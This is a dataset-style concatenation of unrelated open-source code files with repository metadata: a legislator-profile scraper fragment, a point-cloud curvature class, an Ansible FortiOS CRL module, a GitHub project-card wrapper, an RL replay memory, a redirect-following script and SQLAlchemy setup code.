item['party'] = node.xpath('table/tr/td/text()').extract()[0]
if re.search(u'聯絡電話', th):
for phone in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
item['contact_details'].append({'type': 'voice', 'label': u'傳真', 'value': phone})
if re.search(u'傳真電話', th):
for phone in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
item['contact_details'].append({'type': 'fax', 'label': u'傳真', 'value': phone})
if re.search(u'電子郵件', th):
for email in [re.sub(u'\s', '', x) for x in node.xpath('a/text()').extract()]:
item['contact_details'].append({'type': 'email', 'label': u'電子信箱', 'value': email})
if re.search(u'通訊地址', th):
for address in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
item['contact_details'].append({'type': 'address', 'label': u'通訊處', 'value': address})
if re.search(u'學歷', th):
item['education'] = [re.sub(u'\s', '', x) for x in node.xpath('ul/text()').extract()]
if re.search(u'經歷', th):
item['experience'] = [re.sub(u'\s', '', x) for x in node.xpath('ul/text()').extract()]
if re.search(u'備註', th):
item['remark'] = node.xpath('span/font/text()').extract()
if item['remark']:
item['term_end'] = {}
item['term_end']['date'] = GetDate(node.xpath('span/font/text()').extract()[0])
item['term_end']['reason'] = ''
item['in_office'] = False
if re.search(u'服務政見', th):
item['platform'] = [re.sub(u'\s', '', x) for x in node.xpath('ol/text()').extract()]
return item
| [
"twly.tw@gmail.com"
] | twly.tw@gmail.com |
3dc9f20502373cff728ee33faf9c522efd1ec8fc | fec863b67ec1ae65da7111bd8c77d0ab2ef1f6ce | /movie recommendation system/.history/testimportpython_20210430234858.py | e6c7b09f43d29238374e89404f4d08be511f11de | [] | no_license | kannan768/movie-recommendation-system | e6cf71620e25a0185fed3b37896137f1f39b0801 | 7460d440d44e77390e459ab10c535b6971c9c3ab | refs/heads/main | 2023-05-14T02:21:50.930672 | 2021-06-09T05:02:30 | 2021-06-09T05:02:30 | 375,225,316 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | import pymongo
import pandas as pd
client=pymongo.MongoClient("mongodb:local") | [
"kannanbsk1609080@gmail.com"
] | kannanbsk1609080@gmail.com |
c1dda275c9eb15fcb582e6bb36c529df26a40a49 | 163cb4945b7096559b02ced7f547189842373d6a | /pymethods/arrays/Pointsurface.py | c22fe0a7c8e40e3b55bfb921934d29a863e71130 | [] | no_license | mirasobhy/pymethods | 1e3de553648c8ff94c1dcf2bf98667208a0c21c9 | 7d72049c6a9be491aa92c2fc1828eb498bf281f4 | refs/heads/master | 2020-12-28T14:23:19.683888 | 2020-02-05T04:21:31 | 2020-02-05T04:21:31 | 238,367,632 | 0 | 0 | null | 2020-02-05T04:28:20 | 2020-02-05T04:28:19 | null | UTF-8 | Python | false | false | 10,781 | py | try:
from pymethods import (arrays, utils, pyplot, math, algorithms)
except ImportError:
from .. import arrays, utils, pyplot, math, algorithms
import pyvista as pv
from scipy.spatial import cKDTree
import numpy as np
import multiprocessing
from functools import wraps
import logging
_n_cpus = multiprocessing.cpu_count()
_debug_ = False
if _debug_:
show_tqdm = True
else:
show_tqdm = False
class _CurvatureMultiScatter(pyplot.MultiScatter):
def title_generator(self, name, stats):
mean_pm_std = '%0.3f $\pm$ 2x%0.3f' % (stats.mean, stats.std)
return f'{name}, $\mu \pm 2\sigma$={mean_pm_std}'
def name_generator(self, i):
return f'$\kappa_{i+1}$'
def post_plot(self, ax):
pyplot.equal_aspect_3d_centered(self.data.mean(axis=-1), ax=ax)
class _CurvatureMultiScatterError(pyplot.MultiScatter):
def title_generator(self, name, stats):
mean_pm_std = '%0.3f $\pm$ 2x%0.3f' % (stats.mean, stats.std)
return f'{name}, $\mu \pm 2\sigma$={mean_pm_std}'
def name_generator(self, i):
math_title = r'2 * \dfrac{ |pred-true| }{pred+true}'
return f'${math_title}_{i+1}$'
def post_plot(self, ax):
pyplot.equal_aspect_3d_centered(self.data.mean(axis=-1), ax=ax)
class PrintMethod:
def __init__(self, base_verbatim: str) -> None:
self.base_verbatim = base_verbatim
def __call__(self, function):
@wraps(function)
def wrapper(obj, *args, **kwargs):
logging.debug(self.base_verbatim)
output = function(obj, *args, **kwargs)
logging.debug("completed %s" % self.base_verbatim)
return output
return wrapper
class AlignNormalsBFS(algorithms.BreadthFirstSearch):
def post_vertex_query(self) -> None:
self.main_vector = self.properties[self.queried_vertex, :, -1]
def on_unvisited_edge(self) -> None:
test_normal = self.properties[
self.queried_edge_vertex, :, -1]
pos_vect = self.main_vector-test_normal
neg_vect = -self.main_vector-test_normal
mag_pos = sum(pos_vect*pos_vect)
mag_neg = sum(neg_vect*neg_vect)
if mag_neg < mag_pos:
self.properties[self.queried_edge_vertex] *= -1
class Pointsurface(arrays.Vectorspace):
def __init__(
self, *args, leafsize=1000, neighbours=50,
external=True, log=True, **kwargs) -> None:
self.log = log
self.leafsize = leafsize
self.external = external
self.n_neighbours = neighbours
def query_nearest(self, points: np.ndarray) -> np.ndarray:
if not hasattr(self, "kdtree"):
self.compute_kdtree()
points = utils.make_column(points)
dist_indices = self.kdtree.query(points.T, k=(self.n_neighbours+1))
if len(points.T) == len(self.T):
self.nn_weights, self.nn_indices = dist_indices
self.nn_weights = self.nn_weights[:, 1:]
self.nn_indices = self.nn_indices[:, 1:]
indices = dist_indices[1][:, 1:]
return self.kdtree.data[indices].swapaxes(1, 2).view(np.ndarray)
@PrintMethod("computing kdtree")
def compute_kdtree(self) -> cKDTree:
if not hasattr(self, 'kdtree'):
self.kdtree = cKDTree(
self.T, leafsize=self.leafsize)
return self.kdtree
else:
return self.kdtree
@PrintMethod("computing nearest neighbours from kdtree")
def compute_nearest_neighbours(self) -> np.ndarray:
points = utils.make_column(self)
self.nearest_neighbours = self.query_nearest(points)
return self.nearest_neighbours
@PrintMethod("computing normals")
def compute_all_normals(
self) -> np.ndarray:
self.point_basis = self.compute_point_normals(self)
self._align_normals()
self.point_normals = self.point_basis[:, :, -1].T
return self.point_normals
@PrintMethod("computing principle curvatures")
def compute_principle_curvatures(
self, method='can_lsq_fit', n_processors='max') -> np.ndarray:
if not hasattr(self, 'point_basis'):
self.compute_all_normals()
self.principle_curvatures, self.principle_directions = \
getattr(algorithms.curvature_fitting, method)(
self, self.nn_indices, self.point_basis,
n_processors=n_processors)
return self.principle_curvatures, self.principle_directions
@property
def gaussian_curvature(self):
assert hasattr(self, 'principle_curvatures'),\
'principle curvatures not calculated run \
compute_principle_curvature_method'
return self.principle_curvatures[0] * self.principle_curvatures[1]
@property
def mean_curvature(self):
assert hasattr(self, 'principle_curvatures'),\
'principle curvatures not calculated run \
compute_principle_curvature_method'
return (self.principle_curvatures[0] + self.principle_curvatures[1])/2
@property
def maximum_curvature(self):
return self.principle_curvatures[0]
@property
def minimum_curvature(self):
return self.principle_curvatures[1]
def compute_point_normals(self, points: np.ndarray) -> np.ndarray:
if not hasattr(self, 'nearest_neighbours'):
nearest_neighbours = self.compute_nearest_neighbours()
else:
nearest_neighbours = self.nearest_neighbours
centered_nn = nearest_neighbours - points.T[:, :, None]
covar = np.einsum(
"ijk, ikl -> ijl ", centered_nn, centered_nn.swapaxes(1, 2)
)
if show_tqdm:
print("calculating the normals from SVD")
U, s, Vt = np.linalg.svd(covar)
align_bfs = AlignNormalsBFS(
self.nn_indices, properties=U, show_progress=show_tqdm
)
align_bfs(start_vertex=0)
return align_bfs.properties
@PrintMethod("pointing normals outside closed surface'")
def _align_normals(self) -> None:
normals = self.point_basis[:, :, -1].T
centered_points = self - math.mean(self)
sum_pos = np.sum(math.l2_norm(centered_points + normals))
sum_neg = np.sum(math.l2_norm(centered_points - normals))
if sum_neg > sum_pos:
self.point_basis *= -1
if not self.external:
self.point_basis *= -1
def plot_curvature(self, interval=1, *args, **kwargs):
f, ax = _CurvatureMultiScatter(
self, self.principle_curvatures,
*args, **kwargs
)(interval=interval)
return f, ax
def plot_analytical_curvature(self, interval=1, *args, **kwargs):
assert hasattr(self, 'analytical')
f, ax = _CurvatureMultiScatter(
self, (self.analytical.k_1, self.analytical.k_2),
*args, **kwargs
)(interval=interval)
return f, ax
def plot_error(self, interval=1, *args, **kwargs):
assert hasattr(self, 'analytical')
error_1 = math.metrics.relative_percentage_difference(
self.analytical.k_1, self.principle_curvatures[0]
)
error_2 = math.metrics.relative_percentage_difference(
self.analytical.k_2, self.principle_curvatures[1]
)
f, ax = _CurvatureMultiScatterError(
self, (error_1, error_2),
*args, **kwargs
)(interval=interval)
return f, ax
def plot_surface(self, *args, **kwargs):
if len(args) == 0:
args = ('.', )
pyplot.plot3d(*self, *args, **kwargs)
def check_normals_n_at_a_time(self, interval=1000, n_normals=3) -> None:
scale = np.mean(self.nn_weights[:, 3])
for i, (point, normal) in enumerate(
zip(self.T, self.point_normals.T)):
if i % interval == 0:
normal = normal*scale
I_nearest = self.nn_indices[i]
nn = self[:, I_nearest]
nn_normals = self.point_normals[I_nearest]
pyplot.plot3d(*self, '.', alpha=1, markersize=1)
pyplot.quiver3d(*point, *normal)
pyplot.equal_aspect_3d_centered(point)
pyplot.show()
def check_all_normals(self, interval=100) -> None:
centroid = math.mean(self)
scale = np.mean(self.nn_weights[:, 3])
normals = self.point_normals[:, ::interval]*scale
pyplot.plot3d(*self[:, ::interval], '.', alpha=1, markersize=1)
pyplot.quiver3d(
*self[:, ::interval],
*normals)
pyplot.equal_aspect_3d_centered(centroid)
pyplot.show()
def write_structured_vtk(self, newshape):
newshape = list(newshape)
assert all(
[
len(newshape) == 3,
any(
[newshape[0] == 3, newshape[0] == 2]
)
]
)
to_write = np.array(self.copy()).reshape(newshape)
mesh = pv.StructuredGrid(*to_write)
if hasattr(self, 'principle_curvatures'):
for name in ('gaussian_curvature', 'mean_curvature', 'maximum_curvature', 'minimum_curvature'):
temp = np.array(getattr(self, name)).reshape(newshape[1:])
mesh.points_arrays[name] = temp.squeeze().flatten('F')
# if __name__ == "__main__":
# import pathlib
# data_folder = pathlib.Path(
# r'I:\CNNForCFD\test12\true'
# )
# file = data_folder/'00000.vtk'
# pv_obj = pv.read(file)
# points = pv_obj.points.T
# test_points = points[:, ::20]*1000
# # test_points = points*1000
# psurf = Pointsurface(
# test_points, leafsize=100, neighbours=13, external=True)
# psurf.compute_all_normals()
# psurf.compute_principle_curvatures(n_processors=1)
# if False:
# ii = 500
# ids = psurf.nn_indices[ii]
# xx, yy = psurf.principle_directions[ii].T
# X, Y, Z = psurf.point_basis[ii].T
# pyplot.plot3d(*psurf, '.', alpha=0.5, markersize=2)
# pyplot.plot3d(*psurf[:, ii, None], 'go')
# pyplot.plot3d(*psurf[:, ids], 'ro')
# pyplot.quiver3d(*psurf[:, ii, None], *X[:, None], color='blue')
# pyplot.quiver3d(*psurf[:, ii, None], *Y[:, None], color='blue')
# pyplot.quiver3d(*psurf[:, ii, None], *Z[:, None], color='green')
# pyplot.quiver3d(*psurf[:, ii, None], *xx[:, None], color='red')
# pyplot.quiver3d(*psurf[:, ii, None], *yy[:, None], color='red')
# pyplot.equal_aspect_3d_centered(psurf[:, ii, None])
# pyplot.show()
# psurf.plot_curvature()
# pyplot.show()
# psurf.check_all_normals(interval=1)
# print('done')
| [
"38807452+hj40@users.noreply.github.com"
] | 38807452+hj40@users.noreply.github.com |
7d851a9a75ada74b98b107a496c6122be5559ee5 | 578d83b3c4b08ec703b2d66fb073a00224ef7ab0 | /fortimanager/library/fortios_vpn_certificate_crl.py | ec7b1318709b364a8303c8aa1d69395f663e5f7c | [] | no_license | prajavat/fortiget | 9cb73760b1704db9e633ef835ea6b6947ba87647 | 7ed08b1b98284b21934743c1830629c5b48b510c | refs/heads/main | 2023-06-29T18:29:51.963775 | 2021-08-05T07:53:03 | 2021-08-05T07:53:03 | 334,605,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,667 | py | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_vpn_certificate_crl
short_description: Certificate Revocation List as a PEM file in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify vpn_certificate feature and crl category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.2.0
version_added: "2.9"
author:
- Link Zheng (@chillancezen)
- Jie Xue (@JieX19)
- Hongbin Lu (@fgtdev-hblu)
- Frank Shen (@frankshen01)
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Legacy fortiosapi has been deprecated, httpapi is the preferred way to run playbooks
requirements:
- ansible>=2.9.0
options:
access_token:
description:
- Token-based authentication.
Generated from GUI of Fortigate.
type: str
required: false
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
vpn_certificate_crl:
description:
- Certificate Revocation List as a PEM file.
default: null
type: dict
suboptions:
crl:
description:
- Certificate Revocation List as a PEM file.
type: str
http_url:
description:
- HTTP server URL for CRL auto-update.
type: str
last_updated:
description:
- Time at which CRL was last updated.
type: int
ldap_password:
description:
- LDAP server user password.
type: str
ldap_server:
description:
- LDAP server name for CRL auto-update.
type: str
ldap_username:
description:
- LDAP server user name.
type: str
name:
description:
- Name.
required: true
type: str
range:
description:
- Either global or VDOM IP address range for the certificate.
type: str
choices:
- global
- vdom
scep_cert:
description:
- Local certificate for SCEP communication for CRL auto-update. Source vpn.certificate.local.name.
type: str
scep_url:
description:
- SCEP server URL for CRL auto-update.
type: str
source:
description:
- Certificate source type.
type: str
choices:
- factory
- user
- bundle
source_ip:
description:
- Source IP address for communications to a HTTP or SCEP CA server.
type: str
update_interval:
description:
- Time in seconds before the FortiGate checks for an updated CRL. Set to 0 to update only when it expires.
type: int
update_vdom:
description:
- VDOM for CRL update. Source system.vdom.name.
type: str
'''
EXAMPLES = '''
- hosts: fortigates
collections:
- fortinet.fortios
connection: httpapi
vars:
vdom: "root"
ansible_httpapi_use_ssl: yes
ansible_httpapi_validate_certs: no
ansible_httpapi_port: 443
tasks:
- name: Certificate Revocation List as a PEM file.
fortios_vpn_certificate_crl:
vdom: "{{ vdom }}"
state: "present"
access_token: "<your_own_value>"
vpn_certificate_crl:
crl: "<your_own_value>"
http_url: "<your_own_value>"
last_updated: "5"
ldap_password: "<your_own_value>"
ldap_server: "<your_own_value>"
ldap_username: "<your_own_value>"
name: "default_name_9"
range: "global"
scep_cert: "<your_own_value> (source vpn.certificate.local.name)"
scep_url: "<your_own_value>"
source: "factory"
source_ip: "84.230.14.43"
update_interval: "15"
update_vdom: "<your_own_value> (source system.vdom.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortios.plugins.module_utils.fortios.fortios import FortiOSHandler
from ansible_collections.fortinet.fortios.plugins.module_utils.fortios.fortios import check_legacy_fortiosapi
from ansible_collections.fortinet.fortios.plugins.module_utils.fortimanager.common import FAIL_SOCKET_MSG
def filter_vpn_certificate_crl_data(json):
option_list = ['crl', 'http_url', 'last_updated',
'ldap_password', 'ldap_server', 'ldap_username',
'name', 'range', 'scep_cert',
'scep_url', 'source', 'source_ip',
'update_interval', 'update_vdom']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for i, elem in enumerate(data):
data[i] = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def vpn_certificate_crl(data, fos):
vdom = data['vdom']
state = data['state']
vpn_certificate_crl_data = data['vpn_certificate_crl']
filtered_data = underscore_to_hyphen(filter_vpn_certificate_crl_data(vpn_certificate_crl_data))
if state == "present":
return fos.set('vpn.certificate',
'crl',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('vpn.certificate',
'crl',
mkey=filtered_data['name'],
vdom=vdom)
else:
fos._module.fail_json(msg='state must be present or absent!')
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_vpn_certificate(data, fos):
if data['vpn_certificate_crl']:
resp = vpn_certificate_crl(data, fos)
else:
fos._module.fail_json(msg='missing task body: %s' % ('vpn_certificate_crl'))
return not is_successful_status(resp), \
resp['status'] == "success" and \
(resp['revision_changed'] if 'revision_changed' in resp else True), \
resp
def main():
mkeyname = 'name'
fields = {
"access_token": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"vpn_certificate_crl": {
"required": False, "type": "dict", "default": None,
"options": {
"crl": {"required": False, "type": "str"},
"http_url": {"required": False, "type": "str"},
"last_updated": {"required": False, "type": "int"},
"ldap_password": {"required": False, "type": "str"},
"ldap_server": {"required": False, "type": "str"},
"ldap_username": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"range": {"required": False, "type": "str",
"choices": ["global",
"vdom"]},
"scep_cert": {"required": False, "type": "str"},
"scep_url": {"required": False, "type": "str"},
"source": {"required": False, "type": "str",
"choices": ["factory",
"user",
"bundle"]},
"source_ip": {"required": False, "type": "str"},
"update_interval": {"required": False, "type": "int"},
"update_vdom": {"required": False, "type": "str"}
}
}
}
check_legacy_fortiosapi()
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
versions_check_result = None
if module._socket_path:
connection = Connection(module._socket_path)
if 'access_token' in module.params:
connection.set_option('access_token', module.params['access_token'])
fos = FortiOSHandler(connection, module, mkeyname)
is_error, has_changed, result = fortios_vpn_certificate(module.params, fos)
versions_check_result = connection.get_system_version()
else:
module.fail_json(**FAIL_SOCKET_MSG)
if versions_check_result and versions_check_result['matched'] is False:
module.warn("Ansible has detected version mismatch between FortOS system and galaxy, see more details by specifying option -vvv")
if not is_error:
if versions_check_result and versions_check_result['matched'] is False:
module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result)
else:
module.exit_json(changed=has_changed, meta=result)
else:
if versions_check_result and versions_check_result['matched'] is False:
module.fail_json(msg="Error in repo", version_check_warning=versions_check_result, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| [
"prashant@cloudstake.com"
] | prashant@cloudstake.com |
218de8abbc9bfd77742d7ab9ac813686655e4ae3 | 46d2a73deb63f81554c478822459a41f09d8519c | /github/objects/projectcard.py | 4b94450c49a4edf517c719c3e31c973f8a74e7dd | [
"Apache-2.0"
] | permissive | ByteMeDirk/github.py | ad036aef661adc4d9a06239f52b79acd5230c430 | 14b14f857fb85c35b5d14ba073afc36e339199b9 | refs/heads/master | 2023-08-10T17:40:52.783117 | 2020-08-13T23:54:55 | 2020-08-13T23:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,230 | py | """
/github/objects/projectcard.py
Copyright (c) 2019-2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from github import utils
from github.abc import Node
from github.abc import Type
from github.abc import UniformResourceLocatable
from github.enums import ProjectCardState
class ProjectCard(Node, Type, UniformResourceLocatable):
"""
Represents a card in a GitHub project.
Implements:
* :class:`~github.abc.Node`
* :class:`~github.abc.Type`
* :class:`~github.abc.UniformResourceLocatable`
"""
# https://docs.github.com/en/graphql/reference/objects#projectcard
__slots__ = ("data", "http")
def __init__(self, data, http):
self.data = data
self.http = http
@property
def body(self):
"""
The body of the card.
:type: Optional[:class:`str`]
"""
return self.data["note"]
@property
def created_at(self):
"""
When the card was created.
:type: :class:`~datetime.datetime`
"""
created_at = self.data["createdAt"]
return utils.iso_to_datetime(created_at)
@property
def database_id(self):
"""
The card's database ID.
:type: :class:`int`
"""
return self.data["databaseId"]
@property
def is_archived(self):
"""
Whether the card is archived.
:type: :class:`bool`
"""
return self.data["isArchived"]
@property
def state(self):
"""
The card's state.
:type: :class:`~github.enums.ProjectCardState`
"""
state = self.data["state"]
return ProjectCardState.try_value(state)
@property
def updated_at(self):
"""
When the card was last updated.
:type: :class:`~datetime.datetime`
"""
updated_at = self.data["updatedAt"]
return utils.iso_to_datetime(updated_at)
async def move_to(self, column, *, after=None):
"""
|coro|
Moves the card to a column.
Parameters
----------
column: :class:`~github.ProjectColumn`
The column to move the card to.
after: :class:`~github.ProjectCard`
The card to place the card after. Pass ``None`` to place it
at the top. Defaults to ``None``.
Raises
------
~github.errors.Forbidden
You do not have permission to move the card.
"""
# https://docs.github.com/en/graphql/reference/mutations#moveprojectcard
if after is not None:
after = after.id
await self.http.mutate_projectcard_move_to(self.id, column.id, after)
| [
"contact@shiney.dev"
] | contact@shiney.dev |
43876ba54601bc0d0ee260b3f6b6a8ad88551d0d | 730430ba3b45d5728ef044863598199bfa33aaaa | /examples/Baselines/Halite_competition/torch/rl_trainer/replay_memory.py | b4c790801b49cecbdfda042bfbf8dbcc81e1227a | [
"Apache-2.0"
] | permissive | PaddlePaddle/PARL | 062d1b4a5335553be6cdfc33ad12f07ebbcd7310 | 3bb5fe36d245f4d69bae0710dc1dc9d1a172f64d | refs/heads/develop | 2023-08-09T02:12:39.741551 | 2023-05-19T17:52:25 | 2023-05-19T17:52:25 | 131,044,128 | 3,818 | 988 | Apache-2.0 | 2023-07-28T03:59:20 | 2018-04-25T17:54:22 | Python | UTF-8 | Python | false | false | 3,684 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
class ReplayMemory(object):
""" Replay Memory for saving data.
Args:
max_size (int): size of replay memory
obs_dim (int): dimension of the observation
"""
def __init__(self, max_size, obs_dim):
self.max_size = int(max_size)
self.obs_dim = obs_dim
self.reset()
def sample_batch(self, batch_size):
if batch_size > self._curr_size:
batch_idx = np.arange(self._curr_size)
else:
batch_idx = np.random.randint(self._curr_size, size=batch_size)
obs = self.obs[batch_idx]
action = self.action[batch_idx]
value = self.value[batch_idx]
returns = self.returns[batch_idx].reshape((-1, 1))
log_prob = self.log_prob[batch_idx]
adv = self.adv[batch_idx]
return obs, action, value, returns, log_prob, adv
def make_index(self, batch_size):
batch_idx = np.random.randint(self._curr_size, size=batch_size)
return batch_idx
def sample_batch_by_index(self, batch_idx):
obs = self.obs[batch_idx]
action = self.action[batch_idx]
value = self.value[batch_idx]
returns = self.returns[batch_idx]
log_prob = self.log_prob[batch_idx]
adv = self.adv[batch_idx]
return obs, action, value, returns, log_prob, adv
def append(self, obs, act, value, returns, log_prob, adv):
size = len(obs)
self._curr_size = min(self._curr_size + size, self.max_size)
if self._curr_pos + size >= self.max_size:
delta_size = -(size + self._curr_pos - self.max_size)
self.obs = np.roll(self.obs, delta_size, 0)
self.action = np.roll(self.action, delta_size)
self.value = np.roll(self.value, delta_size)
self.returns = np.roll(self.returns, delta_size)
self.log_prob = np.roll(self.log_prob, delta_size)
self.adv = np.roll(self.adv, delta_size)
self._curr_pos += delta_size
self.obs[self._curr_pos:self._curr_pos + size] = obs
self.action[self._curr_pos:self._curr_pos + size] = act
self.value[self._curr_pos:self._curr_pos + size] = value
self.returns[self._curr_pos:self._curr_pos + size] = returns
self.log_prob[self._curr_pos:self._curr_pos + size] = log_prob
self.adv[self._curr_pos:self._curr_pos + size] = adv
self._curr_pos = (self._curr_pos + size) % self.max_size
def size(self):
return self._curr_size
def __len__(self):
return self._curr_size
def reset(self):
self.obs = np.zeros((self.max_size, self.obs_dim), dtype='float32')
self.action = np.zeros((self.max_size, ), dtype='int32')
self.value = np.zeros((self.max_size, ), dtype='float32')
self.returns = np.zeros((self.max_size, ), dtype='float32')
self.log_prob = np.zeros((self.max_size, ), dtype='float32')
self.adv = np.zeros((self.max_size, ), dtype='float32')
self._curr_size = 0
self._curr_pos = 0
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
9825285fd8b02cec04445d56367f20d53ae3c2d7 | 85ac9f05432a2a4299cb43969395fd7865e78267 | /entrega4/src/pruebas/process_redirections_to_turtle.py | 7e480559ab44f750fdf039792dc86192344abdfd | [] | no_license | pablodanielrey/twss | 72d8056c2f3fd2a70d465d3176802dbc019fd022 | b533fa6e0ea86460d8ccb49ec554a6f6e7ab4352 | refs/heads/master | 2023-05-20T03:06:23.078921 | 2021-06-12T23:31:13 | 2021-06-12T23:31:13 | 352,428,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | import sys
import json
import requests
import re
def get_content(req):
if (req.status_code >= 300 and req.status_code < 400):
''' es una redirección '''
url = req.headers['Location']
assert url != None
req = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return get_content(req)
if req.status_code == 200:
return req.text
return None
"""
esto por lo que veo no es necesario
if content and req.status_code != 200:
''' analizo el contenido alternativo '''
alternates = r.headers.get('Alternates',None)
if not alternates:
print(f'No existe representación text/turtle para la url {url}')
return None
url = process_alternates(alternates)
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return url
"""
def process_alternates(alternates):
reg = re.compile('{\"(.*)\".*?{type (.*?)}}')
alts = alternates.split(',')
for a in alts:
m = reg.match(a.strip())
if m:
url = m.group(1)
content = m.group(2)
if 'turtle' in content:
return url
return None
if __name__ == '__main__':
url = sys.argv[1]
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=True)
print(get_content(r))
| [
"pablodanielrey@gmail.com"
] | pablodanielrey@gmail.com |
009bd21a3d2025431d689ed24c60ffaf15d6dd35 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_threesomes.py | 7e62196108961159ab33296a6027c68b9f050abc | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _THREESOMES():
def __init__(self,):
self.name = "THREESOMES"
self.definitions = threesome
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['threesome']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
bf2f71d4544d180707bbd68d82738833911d9391 | a41742023c5725a3e5cfbf50a54601dbe0416855 | /evafm/database/models.py | 41fcb478214df0029c4445d44854f7a1e9d9ee17 | [] | no_license | UfSoft/EvAFM | 1cccb6651833565ccc2e3d241a2e70040e999291 | 72dca1c40ca6ae90d4228ac0e208c623ed6c5d3b | refs/heads/master | 2020-04-15T04:42:43.690612 | 2011-01-21T23:15:51 | 2011-01-21T23:15:51 | 26,618,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # -*- coding: utf-8 -*-
"""
evafm.core.database.models
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: © 2011 UfSoft.org - Pedro Algarvio (pedro@algarvio.me)
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import logging
from os import path
from operator import itemgetter
from datetime import datetime
from types import ModuleType
from uuid import uuid4
import sqlalchemy
from sqlalchemy import and_, or_
from sqlalchemy import orm
from sqlalchemy.orm.exc import UnmappedClassError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.engine.url import make_url, URL
from werkzeug.security import generate_password_hash, check_password_hash
from evafm.database.signals import database_setup
log = logging.getLogger(__name__)
#: create a new module for all the database related functions and objects
sys.modules['evafm.database.db'] = db = ModuleType('db')
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
